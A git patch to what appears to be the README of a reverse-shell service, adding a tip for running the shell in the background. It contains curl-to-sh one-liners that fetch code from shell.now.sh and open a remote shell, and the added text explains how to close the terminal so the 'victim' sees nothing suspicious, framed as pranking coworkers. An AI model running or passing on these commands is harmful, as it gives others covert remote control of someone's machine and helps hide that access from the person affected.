From 2500b20b1f5341b60d0528058504994a2b694a3a Mon Sep 17 00:00:00 2001 From: Luke Childs Date: Tue, 5 Mar 2019 10:49:57 +0700 Subject: [PATCH] Add background process tip (#20) --- README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/README.md b/README.md index fd124d4..42f0c03 100644 --- a/README.md +++ b/README.md @@ -67,6 +67,18 @@ while true; do curl https://shell.now.sh/yourip:1337 | sh; done Be careful if you do this to a coworker, if they leave the office with this still running you're opening them up to attack. +### Running as a background process + +The terminal session needs to be kept open to persist the reverse shell connection. That might be a bit of a giveaway if you're trying to prank coworkers. + +The following command will run the reverse shell in a background process and exit the terminal, leaving no suspicious looking terminal windows open on the victim's machine. + +Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session. + +```shell +sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit +``` + ## License MIT © Luke Childs